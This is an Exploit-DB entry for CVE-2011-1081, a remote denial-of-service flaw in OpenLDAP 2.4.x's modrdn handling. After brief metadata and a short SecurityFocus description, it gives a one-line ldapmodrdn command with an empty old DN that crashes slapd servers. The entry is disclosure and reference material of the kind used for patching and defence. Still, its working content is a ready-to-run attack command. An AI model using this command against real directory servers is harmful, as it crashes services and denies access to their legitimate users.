OpenLDAP 2.4.x - 'modrdn' NULL OldDN Remote Denial of Service Vulnerability

2011-01-03T00:00:00
ID EDB-ID:35445
Type exploitdb
Reporter Serge Dubrouski
Modified 2011-01-03T00:00:00

Description

OpenLDAP 2.4.x 'modrdn' NULL OldDN Remote Denial of Service Vulnerability. CVE-2011-1081. Dos exploit for linux platform

                                        
                                            source: http://www.securityfocus.com/bid/46831/info

OpenLDAP is prone to a remote denial-of-service vulnerability that affects the 'modify relative distinguished name' (modrdn) command.

Attackers can exploit this issue to deny service to legitimate users by crashing affected 'slapd' servers. 

ldapmodrdn -x -H ldap://ldapserver -r '' o=test